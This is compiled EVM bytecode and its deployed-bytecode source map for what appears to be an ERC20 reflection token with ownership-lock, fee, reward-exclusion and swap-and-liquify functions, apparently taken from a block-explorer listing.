00208190555061518181615271565b61518b8483615416565b8773ffffffffffffffffffffffffffffffffffffffff168973ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef856040518082815260200191505060405180910390a3505050505050505050565b601154601081905550601354601281905550565b6000615239606461522b60105485613b8890919063ffffffff16565b613a1090919063ffffffff16565b9050919050565b600061526a606461525c60125485613b8890919063ffffffff16565b613a1090919063ffffffff16565b9050919050565b600061527b6139e5565b905060006152928284613b8890919063ffffffff16565b90506152e681600460003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613a5a90919063ffffffff16565b600460003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600860003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1615615411576153cd83600560003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054613a5a90919063ffffffff16565b600560003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b505050565b61542b82600b54613b3e90919063ffffffff16565b600b8190555061544681600c54613a5a90919063ffffffff16565b600c81905550505056fe45524332303a207472616e7366657220746f20746865207a65726f2061646472657373416d6f756e74206d757374206265206c657373207468616e20746f74616c207265666c656374696f6e734f776e61626c653a206e6577206f776e657220697320746865207a65726f206164647265737345524332303a20617070726f766520746f20746865207a65726f20616464726573735472616e7366657220616d6f756e74206578636565647320746865206d61785478416d6f756e742e536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f7745524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e63655472616e7366657220616d6f756e74206d7573742062652067726561746572207468616e207a65726f45524332303a207472616e736665722066726f6d20746865207a65726f206164647265737345524332303a20617070726f76652066726f6d20746865207a65726f20616464726573734578636c75646564206164647265737365732063616e6e6f742063616c6c20746869732066756e6374696f6e596f7520646f6e27742068617665207065726d697373696f6e20746f20756e6c6f636b45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220400488983f9ac9465543b9ceb41bd8f5af7a04e9e4b58d7ab1f104e66ddbf7b464736f6c634300060c0033
Deployed Bytecode Sourcemap
26360:19066:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;34521:98;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;28765:83;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;29965:161;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;31489:87;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;27320:51;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;29042:95;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;30134:716;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;32413:253;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;28951:83;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;18046:101;;;;;;;;;;;;;:::i;:::-;;33129:479;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;30858:218;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;27132:26;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;31584:377;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;34276:111;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;31969:436;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;27378:38;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;27492:40;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;32674:447;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;38418:123;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;27219:32;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;29145:198;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;16478:148;;;;;;;;;;;;;:::i;:::-;;27545:41;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;18153:105;;;;;;;;;;;;;:::i;:::-;;31361:120;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;15835:79;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;34631:122;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;28856:87;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;31084:269;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;17488:293;;;;;;;;;;;;;:::i;:::-;;29355:93;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;29456:350;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;17033:89;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;27429:22;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;34934:171;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;17874:27;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;34764:162;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;17198:214;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;29814:143;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;34399:110;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;16781:244;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;34521:98;16057:12;:10;:12::i;:::-;16047:22;;:6;;;;;;;;;;:22;;;16039:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;34605:6:::1;34595:7;:16;;;;34521:98:::0;:::o;28765:83::-;28802:13;28835:5;28828:12;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;28765:83;:::o;29965:161::-;30040:4;30057:39;30066:12;:10;:12::i;:::-;30080:7;30089:6;30057:8;:39::i;:::-;30114:4;30107:11;;29965:161;;;;:::o;31489:87::-;31531:7;31558:10;;31551:17;;31489:87;:::o;27320:51::-;;;:::o;29042:95::-;29095:7;29122;;29115:14;;29042:95;:::o;30134:716::-;30232:4;30263;30252:15;;:7;;;;;;;;;;;:15;;;30249:594;;;30301:1;30283:20;;:6;:20;;;;:45;;;;;30326:1;30307:21;;:7;;;;;;;;;;;:21;;;30283:45;30280:132;;;30340:9;30330:7;;:19;;;;;;;;;;;;;;;;;;30280:132;;;30386:7;;;;;;;;;;;30373:20;;:9;:20;;;;30365:47;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;30280:132;30423:36;30433:6;30441:9;30452:6;30423:9;:36::i;:::-;30470:121;30479:6;30487:12;:10;:12::i;:::-;30501:89;30539:6;30501:89;;;;;;;;;;;;;;;;;:11;:19;30513:6;30501:19;;;;;;;;;;;;;;;:33;30521:12;:10;:12::i;:::-;30501:33;;;;;;;;;;;;;;;;:37;;:89;;;;;:::i;:::-;30470:8;:121::i;:::-;30609:4;30602:11;;;;30249:594;30651:36;30661:6;30669:9;30680:6;30651:9;:36::i;:::-;30698:121;30707:6;30715:12;:10;:12::i;:::-;30729:89;30767:6;30729:89;;;;;;;;;;;;;;;;;:11;:19;30741:6;30729:19;;;;;;;;;;;;;;;:33;30749:12;:10;:12::i;:::-;30729:33;;;;;;;;;;;;;;;;:37;;:89;;;;;:::i;:::-;30698:8;:121::i;:::-;30837:4;30830:11;;30134:716;;;;;;:::o;32413:253::-;32479:7;32518;;32507;:18;;32499:73;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;32583:19;32606:10;:8;:10::i;:::-;32583:33;;32634:24;32646:11;32634:7;:11;;:24;;;;:::i;:::-;32627:31;;;32413:253;;;:::o;28951:83::-;28992:5;29017:9;;;;;;;;;;;29010:16;;28951:83;:::o;18046:101::-;16057:12;:10;:12::i;:::-;16047:22;;:6;;;;;;;;;;:22;;;16039:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;17950:7:::1;;;;;;;;;;;17949:8;17941:17;;;::::0;::::1;;18112:4:::2;18102:7;;:14;;;;;;;;;;;;;;;;;;18128:13;;;;;;;;;;18046:101::o:0;33129:479::-;16057:12;:10;:12::i;:::-;16047:22;;:6;;;;;;;;;;:22;;;16039:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;33211:11:::1;:20;33223:7;33211:20;;;;;;;;;;;;;;;;;;;;;;;;;33203:60;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;33279:9;33274:327;33298:9;:16;;;;33294:1;:20;33274:327;;;33356:7;33340:23;;:9;33350:1;33340:12;;;;;;;;;;;;;;;;;;;;;;;;;:23;;;33336:254;;;33399:9;33428:1;33409:9;:16;;;;:20;33399:31;;;;;;;;;;;;;;;;;;;;;;;;;33384:9;33394:1;33384:12;;;;;;;;;;;;;;;;:46;;;;;;;;;;;;;;;;;;33468:1;33449:7;:16;33457:7;33449:16;;;;;;;;;;;;;;;:20;;;;33511:5;33488:11;:20;33500:7;33488:20;;;;;;;;;;;;;;;;:28;;;;;;;;;;;;;;;;;;33535:9;:15;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;33569:5;;33336:254;33316:3;;;;;;;33274:327;;;;33129:479:::0;:::o;30858:218::-;30946:4;30963:83;30972:12;:10;:12::i;:::-;30986:7;30995:50;31034:10;30995:11;:25;31007:12;:10;:12::i;:::-;30995:25;;;;;;;;;;;;;;;:34;31021:7;30995:34;;;;;;;;;;;;;;;;:38;;:50;;;;:::i;:::-;30963:8;:83::i;:::-;31064:4;31057:11;;30858:218;;;;:::o;27132:26::-;;;;:::o;31584:377::-;31636:14;31653:12;:10;:12::i;:::-;31636:29;;31685:11;:19;31697:6;31685:19;;;;;;;;;;;;;;;;;;;;;;;;;31684:20;31676:77;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;31765:15;31789:19;31800:7;31789:10;:19::i;:::-;31764:44;;;;;;;31837:28;31857:7;31837;:15;31845:6;31837:15;;;;;;;;;;;;;;;;:19;;:28;;;;:::i;:::-;31819:7;:15;31827:6;31819:15;;;;;;;;;;;;;;;:46;;;;31886:20;31898:7;31886;;:11;;:20;;;;:::i;:::-;31876:7;:30;;;;31930:23;31945:7;31930:10;;:14;;:23;;;;:::i;:::-;31917:10;:36;;;;31584:377;;;:::o;34276:111::-;16057:12;:10;:12::i;:::-;16047:22;;:6;;;;;;;;;;:22;;;16039:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;34375:4:::1;34345:18;:27;34364:7;34345:27;;;;;;;;;;;;;;;;:34;;;;;;;;;;;;;;;;;;34276:111:::0;:::o;31969:436::-;32059:7;32098;;32087;:18;;32079:62;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;32157:17;32152:246;;32192:15;32216:19;32227:7;32216:10;:19::i;:::-;32191:44;;;;;;;32257:7;32250:14;;;;;32152:246;32299:23;32330:19;32341:7;32330:10;:19::i;:::-;32297:52;;;;;;;32371:15;32364:22;;;31969:436;;;;;:::o;27378:38::-;;;:::o;27492:40::-;;;;;;;;;;;;;:::o;32674:447::-;16057:12;:10;:12::i;:::-;16047:22;;:6;;;;;;;;;;:22;;;16039:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;32871:11:::1;:20;32883:7;32871:20;;;;;;;;;;;;;;;;;;;;;;;;;32870:21;32862:61;;;;;;;;;;;;;;;;;;;;;;;;;;;::::0;::::1;;;;;;;;;;;;;32956:1;32937:7;:16;32945:7;32937:16;;;;;;;;;;;;;;;;:20;32934:108;;;32993:37;33013:7;:16;33021:7;33013:16;;;;;;;;;;;;;;;;32993:19;:37::i;:::-;32974:7;:16;32982:7;32974:16;;;;;;;;;;;;;;;:56;;;;32934:108;33075:4;33052:11;:20;33064:7;33052:20;;;;;;;;;;;;;;;;:27;;;;;;;;;;;;;;;;;;33090:9;33105:7;33090:23;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;32674:447:::0;:::o;38418:123::-;38482:4;38506:18;:27;38525:7;38506:27;;;;;;;;;;;;;;;;;;;;;;;;;38499:34;;38418:123;;;:::o;27219:32::-;;;;:::o;29145:198::-;29211:7;29235:11;:20;29247:7;29235:20;;;;;;;;;;;;;;;;;;;;;;;;;29231:49;;;29264:7;:16;29272:7;29264:16;;;;;;;;;;;;;;;;29257:23;;;;29231:49;29298:37;29318:7;:16;29326:7;29318:16;;;;;;;;;;;;;;;;29298:19;:37::i;:::-;29291:44;;29145:198;;;;:::o;16478:148::-;16057:12;:10;:12::i;:::-;16047:22;;:6;;;;;;;;;;:22;;;16039:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;16585:1:::1;16548:40;;16569:6;::::0;::::1;;;;;;;;16548:40;;;;;;;;;;;;16616:1;16599:6:::0;::::1;:19;;;;;;;;;;;;;;;;;;16478:148::o:0;27545:41::-;;;;:::o;18153:105::-;16057:12;:10;:12::i;:::-;16047:22;;:6;;;;;;;;;;:22;;;16039:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;18018:7:::1;;;;;;;;;;;18010:16;;;::::0;::::1;;18221:5:::2;18211:7;;:15;;;;;;;;;;;;;;;;;;18238:14;;;;;;;;;;18153:105::o:0;31361:120::-;31429:4;31453:11;:20;31465:7;31453:20;;;;;;;;;;;;;;;;;;;;;;;;;31446:27;;31361:120;;;:::o;15835:79::-;15873:7;15900:6;;;;;;;;;;;15893:13;;15835:79;:::o;34631:122::-;16057:12;:10;:12::i;:::-;16047:22;;:6;;;;;;;;;;:22;;;16039:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;34733:12:::1;34717:13;:28;;;;34631:122:::0;:::o;28856:87::-;28895:13;28928:7;28921:14;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;28856:87;:::o;31084:269::-;31177:4;31194:129;31203:12;:10;:12::i;:::-;31217:7;31226:96;31265:15;31226:96;;;;;;;;;;;;;;;;;:11;:25;31238:12;:10;:12::i;:::-;31226:25;;;;;;;;;;;;;;;:34;31252:7;31226:34;;;;;;;;;;;;;;;;:38;;:96;;;;;:::i;:::-;31194:8;:129::i;:::-;31341:4;31334:11;;31084:269;;;;:::o;17488:293::-;17558:10;17540:28;;:14;;;;;;;;;;;:28;;;17532:76;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;17633:9;;17627:3;:15;17619:60;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;17724:14;;;;;;;;;;;17695:44;;17716:6;;;;;;;;;;17695:44;;;;;;;;;;;;17759:14;;;;;;;;;;;17750:6;;:23;;;;;;;;;;;;;;;;;;17488:293::o;29355:93::-;16057:12;:10;:12::i;:::-;16047:22;;:6;;;;;;;;;;:22;;;16039:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;29432:8:::1;29422:7;;:18;;;;;;;;;;;;;;;;;;29355:93:::0;:::o;29456:350::-;29534:4;29565;29554:15;;:7;;;;;;;;;;;:15;;;29551:248;;;29603:7;;;;;;;;;;;29590:20;;:9;:20;;;;29582:47;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;29640:42;29650:12;:10;:12::i;:::-;29664:9;29675:6;29640:9;:42::i;:::-;29700:4;29693:11;;;;29551:248;29733:42;29743:12;:10;:12::i;:::-;29757:9;29768:6;29733:9;:42::i;:::-;29793:4;29786:11;;29456:350;;;;;:::o;17033:89::-;17078:7;17105:9;;17098:16;;17033:89;:::o;27429:22::-;;;;;;;;;;;;;:::o;34934:171::-;16057:12;:10;:12::i;:::-;16047:22;;:6;;;;;;;;;;:22;;;16039:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;35035:8:::1;35011:21;;:32;;;;;;;;;;;;;;;;;;35059:38;35088:8;35059:38;;;;;;;;;;;;;;;;;;;;34934:171:::0;:::o;17874:27::-;;;;;;;;;;;;;:::o;34764:162::-;16057:12;:10;:12::i;:::-;16047:22;;:6;;;;;;;;;;:22;;;16039:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;34858:60:::1;34902:5;34858:25;34870:12;34858:7;;:11;;:25;;;;:::i;:::-;:29;;:60;;;;:::i;:::-;34843:12;:75;;;;34764:162:::0;:::o;17198:214::-;16057:12;:10;:12::i;:::-;16047:22;;:6;;;;;;;;;;:22;;;16039:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;17279:6:::1;::::0;::::1;;;;;;;;17262:14;;:23;;;;;;;;;;;;;;;;;;17313:1;17296:6:::0;::::1;:19;;;;;;;;;;;;;;;;;;17344:4;17338:3;:10;17326:9;:22;;;;17401:1;17364:40;;17385:6;::::0;::::1;;;;;;;;17364:40;;;;;;;;;;;;17198:214:::0;:::o;29814:143::-;29895:7;29922:11;:18;29934:5;29922:18;;;;;;;;;;;;;;;:27;29941:7;29922:27;;;;;;;;;;;;;;;;29915:34;;29814:143;;;;:::o;34399:110::-;16057:12;:10;:12::i;:::-;16047:22;;:6;;;;;;;;;;:22;;;16039:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;34496:5:::1;34466:18;:27;34485:7;34466:27;;;;;;;;;;;;;;;;:35;;;;;;;;;;;;;;;;;;34399:110:::0;:::o;16781:244::-;16057:12;:10;:12::i;:::-;16047:22;;:6;;;;;;;;;;:22;;;16039:67;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;16890:1:::1;16870:22;;:8;:22;;;;16862:73;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;16980:8;16951:38;;16972:6;::::0;::::1;;;;;;;;16951:38;;;;;;;;;;;;17009:8;17000:6;::::0;:17:::1;;;;;;;;;;;;;;;;;;16781:244:::0;:::o;8243:106::-;8296:15;8331:10;8324:17;;8243:106;:::o;38549:337::-;38659:1;38642:19;;:5;:19;;;;38634:68;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;38740:1;38721:21;;:7;:21;;;;38713:68;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;38824:6;38794:11;:18;38806:5;38794:18;;;;;;;;;;;;;;;:27;38813:7;38794:27;;;;;;;;;;;;;;;:36;;;;38862:7;38846:32;;38855:5;38846:32;;;38871:6;38846:32;;;;;;;;;;;;;;;;;;38549:337;;;:::o;38894:1813::-;39032:1;39016:18;;:4;:18;;;;39008:68;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;39109:1;39095:16;;:2;:16;;;;39087:64;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;39179:1;39170:6;:10;39162:64;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;39248:7;:5;:7::i;:::-;39240:15;;:4;:15;;;;:32;;;;;39265:7;:5;:7::i;:::-;39259:13;;:2;:13;;;;39240:32;39237:125;;;39305:12;;39295:6;:22;;39287:75;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;39237:125;39657:28;39688:24;39706:4;39688:9;:24::i;:::-;39657:55;;39760:12;;39736:20;:36;39733:112;;39821:12;;39798:35;;39733:112;39865:24;39916:29;;39892:20;:53;;39865:80;;39974:19;:53;;;;;40011:16;;;;;;;;;;40010:17;39974:53;:91;;;;;40052:13;40044:21;;:4;:21;;;;39974:91;:129;;;;;40082:21;;;;;;;;;;;39974:129;39956:318;;;40153:29;;40130:52;;40226:36;40241:20;40226:14;:36::i;:::-;39956:318;40355:12;40370:4;40355:19;;40482:18;:24;40501:4;40482:24;;;;;;;;;;;;;;;;;;;;;;;;;:50;;;;40510:18;:22;40529:2;40510:22;;;;;;;;;;;;;;;;;;;;;;;;;40482:50;40479:96;;;40558:5;40548:15;;40479:96;40661:38;40676:4;40681:2;40684:6;40691:7;40661:14;:38::i;:::-;38894:1813;;;;;;:::o;4653:192::-;4739:7;4772:1;4767;:6;;4775:12;4759:29;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;4799:9;4815:1;4811;:5;4799:17;;4836:1;4829:8;;;4653:192;;;;;:::o;36568:163::-;36609:7;36630:15;36647;36666:19;:17;:19::i;:::-;36629:56;;;;36703:20;36715:7;36703;:11;;:20;;;;:::i;:::-;36696:27;;;;36568:163;:::o;6051:132::-;6109:7;6136:39;6140:1;6143;6136:39;;;;;;;;;;;;;;;;;:3;:39::i;:::-;6129:46;;6051:132;;;;:::o;3750:181::-;3808:7;3828:9;3844:1;3840;:5;3828:17;;3869:1;3864;:6;;3856:46;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;3922:1;3915:8;;;3750:181;;;;:::o;35366:419::-;35425:7;35434;35443;35452;35461;35470;35491:23;35516:12;35530:18;35552:20;35564:7;35552:11;:20::i;:::-;35490:82;;;;;;35584:15;35601:23;35626:12;35642:50;35654:7;35663:4;35669:10;35681;:8;:10::i;:::-;35642:11;:50::i;:::-;35583:109;;;;;;35711:7;35720:15;35737:4;35743:15;35760:4;35766:10;35703:74;;;;;;;;;;;;;;;;;;35366:419;;;;;;;:::o;4214:136::-;4272:7;4299:43;4303:1;4306;4299:43;;;;;;;;;;;;;;;;;:3;:43::i;:::-;4292:50;;4214:136;;;;:::o;5104:471::-;5162:7;5412:1;5407;:6;5403:47;;;5437:1;5430:8;;;;5403:47;5462:9;5478:1;5474;:5;5462:17;;5507:1;5502;5498;:5;;;;;;:10;5490:56;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;5566:1;5559:8;;;5104:471;;;;;:::o;40715:985::-;27978:4;27959:16;;:23;;;;;;;;;;;;;;;;;;40851:12:::1;40866:27;40891:1;40866:20;:24;;:27;;;;:::i;:::-;40851:42;;40904:17;40924:30;40949:4;40924:20;:24;;:30;;;;:::i;:::-;40904:50;;41232:22;41257:21;41232:46;;41323:22;41340:4;41323:16;:22::i;:::-;41476:18;41497:41;41523:14;41497:21;:25;;:41;;;;:::i;:::-;41476:62;;41588:35;41601:9;41612:10;41588:12;:35::i;:::-;41649:43;41664:4;41670:10;41682:9;41649:43;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;27993:1;;;;28024:4:::0;28005:16;;:23;;;;;;;;;;;;;;;;;;40715:985;:::o;42899:834::-;43010:7;43006:40;;43032:14;:12;:14::i;:::-;43006:40;43071:11;:19;43083:6;43071:19;;;;;;;;;;;;;;;;;;;;;;;;;:46;;;;;43095:11;:22;43107:9;43095:22;;;;;;;;;;;;;;;;;;;;;;;;;43094:23;43071:46;43067:597;;;43134:48;43156:6;43164:9;43175:6;43134:21;:48::i;:::-;43067:597;;;43205:11;:19;43217:6;43205:19;;;;;;;;;;;;;;;;;;;;;;;;;43204:20;:46;;;;;43228:11;:22;43240:9;43228:22;;;;;;;;;;;;;;;;;;;;;;;;;43204:46;43200:464;;;43267:46;43287:6;43295:9;43306:6;43267:19;:46::i;:::-;43200:464;;;43336:11;:19;43348:6;43336:19;;;;;;;;;;;;;;;;;;;;;;;;;43335:20;:47;;;;;43360:11;:22;43372:9;43360:22;;;;;;;;;;;;;;;;;;;;;;;;;43359:23;43335:47;43331:333;;;43399:44;43417:6;43425:9;43436:6;43399:17;:44::i;:::-;43331:333;;;43465:11;:19;43477:6;43465:19;;;;;;;;;;;;;;;;;;;;;;;;;:45;;;;;43488:11;:22;43500:9;43488:22;;;;;;;;;;;;;;;;;;;;;;;;;43465:45;43461:203;;;43527:48;43549:6;43557:9;43568:6;43527:21;:48::i;:::-;43461:203;;;43608:44;43626:6;43634:9;43645:6;43608:17;:44::i;:::-;43461:203;43331:333;43200:464;43067:597;43688:7;43684:41;;43710:15;:13;:15::i;:::-;43684:41;42899:834;;;;:::o;36739:561::-;36789:7;36798;36818:15;36836:7;;36818:25;;36854:15;36872:7;;36854:25;;36901:9;36896:289;36920:9;:16;;;;36916:1;:20;36896:289;;;36986:7;36962;:21;36970:9;36980:1;36970:12;;;;;;;;;;;;;;;;;;;;;;;;;36962:21;;;;;;;;;;;;;;;;:31;:66;;;;37021:7;36997;:21;37005:9;37015:1;37005:12;;;;;;;;;;;;;;;;;;;;;;;;;36997:21;;;;;;;;;;;;;;;;:31;36962:66;36958:97;;;37038:7;;37047;;37030:25;;;;;;;;;36958:97;37080:34;37092:7;:21;37100:9;37110:1;37100:12;;;;;;;;;;;;;;;;;;;;;;;;;37092:21;;;;;;;;;;;;;;;;37080:7;:11;;:34;;;;:::i;:::-;37070:44;;37139:34;37151:7;:21;37159:9;37169:1;37159:12;;;;;;;;;;;;;;;;;;;;;;;;;37151:21;;;;;;;;;;;;;;;;37139:7;:11;;:34;;;;:::i;:::-;37129:44;;36938:3;;;;;;;36896:289;;;;37209:20;37221:7;;37209;;:11;;:20;;;;:::i;:::-;37199:7;:30;37195:61;;;37239:7;;37248;;37231:25;;;;;;;;37195:61;37275:7;37284;37267:25;;;;;;36739:561;;;:::o;6679:278::-;6765:7;6797:1;6793;:5;6800:12;6785:28;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6824:9;6840:1;6836;:5;;;;;;6824:17;;6948:1;6941:8;;;6679:278;;;;;:::o;35793:330::-;35853:7;35862;35871;35891:12;35906:24;35922:7;35906:15;:24::i;:::-;35891:39;;35941:18;35962:30;35984:7;35962:21;:30::i;:::-;35941:51;;36003:23;36029:33;36051:10;36029:17;36041:4;36029:7;:11;;:17;;;;:::i;:::-;:21;;:33;;;;:::i;:::-;36003:59;;36081:15;36098:4;36104:10;36073:42;;;;;;;;;35793:330;;;;;:::o;36131:429::-;36246:7;36255;36264;36284:15;36302:24;36314:11;36302:7;:11;;:24;;;;:::i;:::-;36284:42;;36337:12;36352:21;36361:11;36352:4;:8;;:21;;;;:::i;:::-;36337:36;;36384:18;36405:27;36420:11;36405:10;:14;;:27;;;;:::i;:::-;36384:48;;36443:23;36469:33;36491:10;36469:17;36481:4;36469:7;:11;;:17;;;;:::i;:::-;:21;;:33;;;;:::i;:::-;36443:59;;36521:7;36530:15;36547:4;36513:39;;;;;;;;;;36131:429;;;;;;;;:::o;41708:589::-;41834:21;41872:1;41858:16;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;41834:40;;41903: